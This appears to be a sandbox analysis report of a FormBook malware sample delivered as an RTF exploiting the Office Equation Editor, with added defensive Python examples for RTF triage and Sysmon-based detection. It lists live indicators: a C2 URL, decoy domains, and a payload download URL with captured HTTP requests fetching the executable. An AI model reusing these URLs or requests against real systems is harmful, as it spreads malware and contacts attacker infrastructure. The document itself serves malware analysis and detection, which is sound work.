Windows Analysis Report
Revised RFQ-PO180911.doc

Overview

General Information

Sample Name: Revised RFQ-PO180911.doc
Analysis ID: 635413
MD5: afaa3f4a9a241593ea30e05773c22980
SHA1: 1d9dabc7f48e7d3c50c3d7d36a371be6bb63746d
SHA256: 25966cc19f04cbbdacdf04249247d606c037cb527669addbfb0d52e0cd948519
Tags: docRFQ

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign process
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document lacks an OLE stream usually present in this Microsoft Office document type
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Allocates memory within the address range reserved for system DLLs (kernel32.dll, advapi32.dll, etc.)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard
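The signature list above says the sample is an obfuscated RTF (despite the .doc name) carrying a Microsoft Equation 3.0 OLE object, which is the lure for the Equation Editor bugs. The script below is an added example, not part of the Joe Sandbox report, of the static check an analyst would run before detonation: it pulls every \objdata group out of the RTF, strips the unknown control words, whitespace and nested groups that obfuscated RTFs scatter through the hex (Word ignores them too), hex-decodes the result and looks for the Equation.3 ProgID, the "Microsoft Equation 3.0" name and the Equation.3 CLSID {0002CE02-0000-0000-C000-000000000046}. The RTF it scans is constructed here, the junk control word \junk12 is invented, the OLE1 payload is abbreviated and carries no exploit, and all function names are the example's own.

```python
"""Static triage of an RTF for an embedded Equation Editor (Equation.3) object.
Added example; the RTF it scans is constructed, not the analysed sample."""
import re

# Equation.3 CLSID {0002CE02-0000-0000-C000-000000000046} as stored on disk
# (Data1..Data3 little-endian, Data4 as-is).
EQUATION3_CLSID = bytes.fromhex("02CE020000000000C000000000000046")
INDICATORS = {
    "Equation.3 progid": b"Equation.3",
    "Equation 3.0 name": b"Microsoft Equation 3.0",
    "Equation.3 CLSID": EQUATION3_CLSID,
}
# An RTF control word: backslash, letters, optional signed number, optional space.
CONTROL_WORD = re.compile(rb"\\[a-zA-Z]+-?\d* ?")


def objdata_blobs(rtf):
    """Yield the decoded bytes of every \\objdata group. Obfuscated RTFs pad the
    hex with unknown control words, whitespace and nested groups that Word
    ignores; they are stripped here the same way before hex-decoding."""
    pos = 0
    while True:
        start = rtf.find(b"\\objdata", pos)
        if start < 0:
            return
        i, depth, body = start + len(b"\\objdata"), 1, bytearray()
        while i < len(rtf) and depth:          # walk to the group's closing brace
            c = rtf[i:i + 1]
            if c == b"{":
                depth += 1
            elif c == b"}":
                depth -= 1
            else:
                body += c
            i += 1
        hexchars = re.sub(rb"[^0-9a-fA-F]", b"", CONTROL_WORD.sub(b"", bytes(body)))
        if len(hexchars) % 2:                  # drop a dangling nibble
            hexchars = hexchars[:-1]
        yield bytes.fromhex(hexchars.decode("ascii"))
        pos = i


def triage_rtf(rtf):
    """Report the header anomaly and, per embedded object, which Equation
    Editor indicators its decoded OLE data contains."""
    findings = {"header_ok": rtf.startswith(b"{\\rtf1"), "objects": []}
    for n, blob in enumerate(objdata_blobs(rtf)):
        hits = [name for name, needle in INDICATORS.items() if needle in blob]
        findings["objects"].append({"index": n, "size": len(blob),
                                    "equation_indicators": hits})
    findings["equation_object"] = any(o["equation_indicators"] for o in findings["objects"])
    return findings


def build_sample():
    """Constructed RTF: non-standard header, one benign object, one Equation.3
    object whose hex is broken up with a junk control word (\\junk12) and line
    breaks. The OLE1 payload is abbreviated; it carries no exploit."""
    cls = b"Equation.3\0"
    ole1 = (b"\x01\x05\x00\x00\x02\x00\x00\x00" + len(cls).to_bytes(4, "little") + cls
            + b"\x00" * 8 + b"Microsoft Equation 3.0\0" + EQUATION3_CLSID + b"A" * 32)
    hexdata = ole1.hex().encode("ascii")
    noisy = b"\\junk12\r\n".join(hexdata[i:i + 16] for i in range(0, len(hexdata), 16))
    benign = b"{\\object\\objemb{\\*\\objclass Word.Document.8}{\\*\\objdata 0105000002000000}}"
    evil = b"{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata " + noisy + b"}}"
    return b"{\\rtf" + benign + evil + b"}"


if __name__ == "__main__":
    print(triage_rtf(build_sample()))
```

Run it against a real sample by replacing build_sample() with the file bytes; a hit on any of the three indicators plus a header that is not {\rtf1 is enough to route the document to a sandbox rather than a user.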

Classification

AV Detection

Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook
{
  "C2 list": ["www.rthearts.com/nk6l/"],
  "decoy": [
    "cbnextra.com", "entitysystemsinc.com", "55midwoodave.com", "ebelizzi.com",
    "khojcity.com", "1527brokenoakdrive.site", "housinghproperties.com", "ratiousa.com",
    "lrcrepresentacoes.net", "tocoec.net", "khadamatdemnate.com", "davidkastner.xyz",
    "gardeniaresort.com", "qiantangguoji.com", "visaprepaidprocessinq.com", "cristinamadara.com",
    "semapisus.xyz", "mpwebagency.net", "alibabasdeli.com", "gigasupplies.com",
    "quantumskillset.com", "eajui136.xyz", "patsanchezelpaso.com", "trined.mobi",
    "amaturz.info", "approveprvqsx.xyz", "fronterapost.house", "clairewashere.site",
    "xn--3jst70hg8f.com", "thursdaynightthriller.com", "primacykapjlt.xyz", "vaginette.site",
    "olitusd.com", "paypal-caseid521.com", "preose.xyz", "ferbsqlv28.club",
    "iffiliatefreedom.com", "okdahotel.com", "cochuzyan.xyz", "hotyachts.net",
    "diamond-beauties.com", "storyofsol.com", "xianshucai.net", "venusmedicalarts.com",
    "energiaorgonu.com", "savannah.biz", "poeticdaily.com", "wilddalmatian.com",
    "kdydkyqksqucyuyen.com", "meanmod.xyz", "kaka.digital", "viewcision.com",
    "wowzerbackupandrestore-us.com", "hydrogendatapower.com", "427521.com", "ponto-bras.space",
    "chevalsk.com", "hnftdl.com", "nanasyhogar.com", "createacarepack.com",
    "wildkraeuter-wochenende.com", "uchihomedeco.com", "quintongiang.com", "mnbvending.com"
  ]
}
Source: Revised RFQ-PO180911.doc Virustotal: Detection: 31%
Source: Revised RFQ-PO180911.doc ReversingLabs: Detection: 32%
Source: Yara match File source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: http://sanbarts.com/cssati.exe Avira URL Cloud: Label: malware
Source: http://www.sanbarts.com/cssati.exe Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp Avira: detection malicious, Label: EXP/CVE-2018-0798.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe ReversingLabs: Detection: 61%
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Roaming\word.exe ReversingLabs: Detection: 61%
Source: 6.0.dvukljmnr.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.dvukljmnr.exe.160000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.dvukljmnr.exe.400000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.dvukljmnr.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.dvukljmnr.exe.400000.9.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\word.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 194.9.94.86 Port: 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 45.120.185.113 Port: 80
Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.dr Stream path '_1715191568/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\krajo\ynpcjm\ntdn\3216792803f64d1292a50b8c7f0c4afc\ibwuyp\qahbtotu\Release\qahbtotu.pdb source: word.exe, 00000004.00000002.945823698.0000000002800000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp, dvukljmnr.exe, 00000005.00000000.914293624.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1182845110.000000000244F000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182267839.00000000002C2000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe.4.dr, nstBFBE.tmp.4.dr
Source: Binary string: wntdll.pdb source: dvukljmnr.exe, dvukljmnr.exe, 00000006.00000003.923098867.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984351623.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000003.925762664.0000000000740000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000002.1182604769.00000000020D0000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.985104310.00000000009A0000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.983888458.0000000000840000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wuapp.pdb source: dvukljmnr.exe, 00000006.00000002.984008037.0000000000504000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.983799814.0000000000030000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\word.exe Code function: 4_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 4_2_00405426
Source: C:\Users\user\AppData\Roaming\word.exe Code function: 4_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose, 4_2_00405D9C
Source: C:\Users\user\AppData\Roaming\word.exe Code function: 4_2_004026A1 FindFirstFileA, 4_2_004026A1
Source: global traffic DNS query: name: sanbarts.com
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 194.9.94.86:80
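The process-creation, network and file-drop events in this section are exactly what the Sigma rules named in the signature list ("EQNEDT32.EXE connecting to internet", "File Dropped By EQNEDT32EXE") and the "Office equation editor starts processes" signature key on. The following is an added example, not the sandbox's or Sigma's code, of that logic run over Sysmon-style events constructed to mirror the chain above: EQNEDT32.EXE launched with -Embedding, its port-80 connection, the dropped word.exe, and the word.exe -> dvukljmnr.exe follow-on. Process IDs and the svchost.exe parent of EQNEDT32.EXE are assumptions (the report records that parent as unknown); function names are the example's own.

```python
"""Detection logic for the EQNEDT32.EXE behaviours in this report, run over
constructed Sysmon-style events. Added example, not the sandbox's own code."""
from collections import defaultdict

EQNEDT32 = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"

# Constructed events modelled on the report's process chain. Field names follow
# Sysmon: EventID 1 = process create, 3 = network connect, 11 = file create.
# PIDs and the svchost.exe parent of EQNEDT32.EXE are assumptions.
EVENTS = [
    {"EventID": 1, "ProcessId": 2000, "ParentProcessId": 1000,
     "Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessId": 2100, "ParentProcessId": 700,
     "Image": EQNEDT32, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": f'"{EQNEDT32}" -Embedding'},
    {"EventID": 3, "ProcessId": 2100, "Image": EQNEDT32,
     "DestinationIp": "194.9.94.86", "DestinationPort": 80},
    {"EventID": 11, "ProcessId": 2100, "Image": EQNEDT32,
     "TargetFilename": r"C:\Users\user\AppData\Roaming\word.exe"},
    {"EventID": 1, "ProcessId": 2200, "ParentProcessId": 2100,
     "Image": r"C:\Users\user\AppData\Roaming\word.exe", "ParentImage": EQNEDT32},
    {"EventID": 1, "ProcessId": 2300, "ParentProcessId": 2200,
     "Image": r"C:\Users\user\AppData\Local\Temp\dvukljmnr.exe",
     "ParentImage": r"C:\Users\user\AppData\Roaming\word.exe"},
]

EXEC_EXT = (".exe", ".dll", ".scr", ".com", ".vbs", ".js", ".ps1", ".bat")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_eqnedt(path):
    return basename(path) == "eqnedt32.exe"


def detect(events):
    """Return (alerts, chain). alerts: (rule, detail) tuples in event order, one
    per matching event; chain: images of every process spawned directly or
    transitively by EQNEDT32.EXE, so later stages are attributed to the exploit."""
    alerts = []
    children = defaultdict(list)   # ParentProcessId -> child EventID 1 events
    eqn_pids = []
    for e in events:
        eid = e["EventID"]
        if eid == 1:
            children[e["ParentProcessId"]].append(e)
            if is_eqnedt(e["Image"]):
                eqn_pids.append(e["ProcessId"])
            # The Equation Editor has no legitimate reason to create child
            # processes: "Office equation editor starts processes".
            if is_eqnedt(e["ParentImage"]):
                alerts.append(("eqnedt32_spawns_process", e["Image"]))
        elif eid == 3 and is_eqnedt(e["Image"]):
            # "EQNEDT32.EXE connecting to internet"
            alerts.append(("eqnedt32_network_connect",
                           f'{e["DestinationIp"]}:{e["DestinationPort"]}'))
        elif eid == 11 and is_eqnedt(e["Image"]):
            # "File Dropped By EQNEDT32EXE", narrowed to executable extensions
            if e["TargetFilename"].lower().endswith(EXEC_EXT):
                alerts.append(("eqnedt32_drops_executable", e["TargetFilename"]))
    # Walk the process tree down from every EQNEDT32.EXE instance.
    chain, stack = [], list(eqn_pids)
    while stack:
        pid = stack.pop()
        for child in children.get(pid, []):
            chain.append(child["Image"])
            stack.append(child["ProcessId"])
    return alerts, chain


if __name__ == "__main__":
    found, tree = detect(EVENTS)
    for rule, detail in found:
        print(rule, detail)
    print("descendants of EQNEDT32.EXE:", tree)
```

The three rules fire independently, so a variant that only drops a file, or only connects out, is still caught; the chain walk is what lets the later stages (word.exe, dvukljmnr.exe) be tied back to the document even though their own events look like ordinary user-land process creation.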

Networking

Source: C:\Windows\explorer.exe Domain query: www.paypal-caseid521.com
Source: C:\Windows\explorer.exe Network Connect: 98.137.244.37 80
Source: C:\Windows\explorer.exe Domain query: www.storyofsol.com
Source: C:\Windows\explorer.exe Domain query: www.createacarepack.com
Source: Malware configuration extractor URLs: www.rthearts.com/nk6l/
Source: Joe Sandbox View ASN Name: LOOPIASE
Source: Joe Sandbox View ASN Name: YAHOO-GQ1US
Source: global traffic HTTP traffic detected:
  GET /nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi HTTP/1.1
  Host: www.createacarepack.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View IP Address: 194.9.94.86
Source: global traffic HTTP traffic detected:
  HTTP/1.1 200 OK
  Content-Type: application/octet-stream
  Last-Modified: Thu, 26 May 2022 00:40:19 GMT
  Accept-Ranges: bytes
  ETag: "4042e42c9970d81:0"
  Server: Microsoft-IIS/10.0
  X-Powered-By: ASP.NET
  Date: Fri, 27 May 2022 19:20:07 GMT
  Content-Length: 299113
  Data Raw (start of the 299113-byte body; the rest of the hex dump is not reproduced): 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00
  Data Ascii: MZ ... "This program cannot be run in DOS mode." (a PE file: PE\0\0 at offset 0xd8, Machine 0x014c i386, 5 sections named .text, .rdata, .data, .ndata and .rsrc; .ndata is the section name NSIS installers use)
Source: global traffic HTTP traffic detected:
  GET /cssati.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: sanbarts.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /cssati.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Connection: Keep-Alive
  Host: www.sanbarts.com
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Fri, 27 May 2022 19:21:49 GMT
  P3P: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
  Vary: Accept-Encoding
  Content-Length: 73
  Content-Type: text/html; charset=iso-8859-1
  Age: 0
  Connection: close
  Server: ATS
  Data Raw: 3c 68 31 20 73 74 79 6c 65 3d 27 63 6f 6c 6f 72 3a 23 34 39 37 41 39 37 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 27 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64
  Data Ascii: <h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 - Not Found
Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: EQNEDT32.EXE, 00000002.00000002.915025383.000000000098D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sanbarts.com/33
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.914970619.00000000008F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sanbarts.com/cssati.exe
Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sanbarts.com/cssati.exej
Source: explorer.exe, 00000007.00000000.961585251.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000007.00000000.967364013.0000000006450000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000007.00000000.961585251.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000007.00000000.971345322.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.947051365.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023929548.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.951705279.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000007.00000000.974718954.00000000085F2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner1SPS0
Source: explorer.exe, 00000007.00000000.958260640.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.958544011.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.974718954.00000000085F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.947051365.0000000008675000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000007.00000000.963238551.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.939397773.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023929548.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.951705279.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerq
Source: explorer.exe, 00000007.00000000.1025977451.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.953687008.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.965173113.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.941729011.0000000004385000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerv
Source: EQNEDT32.EXE, 00000002.00000002.914993763.0000000000933000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sanbarts.com/Couri
Source: EQNEDT32.EXE, 00000002.00000002.914993763.0000000000933000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sanbarts.com/YR$
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sanbarts.com/cssati.exe
Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sanbarts.com/cssati.exeC:
